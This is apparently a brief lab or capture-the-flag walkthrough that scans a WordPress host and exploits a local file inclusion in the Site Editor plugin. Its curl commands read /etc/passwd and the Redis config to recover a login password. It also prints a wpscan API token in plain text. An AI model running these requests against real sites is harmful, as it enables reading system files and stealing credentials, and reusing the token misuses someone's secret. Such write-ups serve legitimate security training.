80
There is a wordpress website running: 
Running wpscan:
wpscan --url http://192.168.159.166 --api-token qa7plsUQx372hiQc5FQUPOjcfhGUCQ2Dp8DQi4ate2k
Searching in searchsploit:
searchsploit Site Editor
Now we can exploit it: 
curl http://192.168.159.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Now we can look for redis config files as it is running on port 6379
curl http://192.168.159.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf > redis.confThen we can find the password in the file: 
Now we can use this to login to redis on port [[6379]]
Last updated
Was this helpful?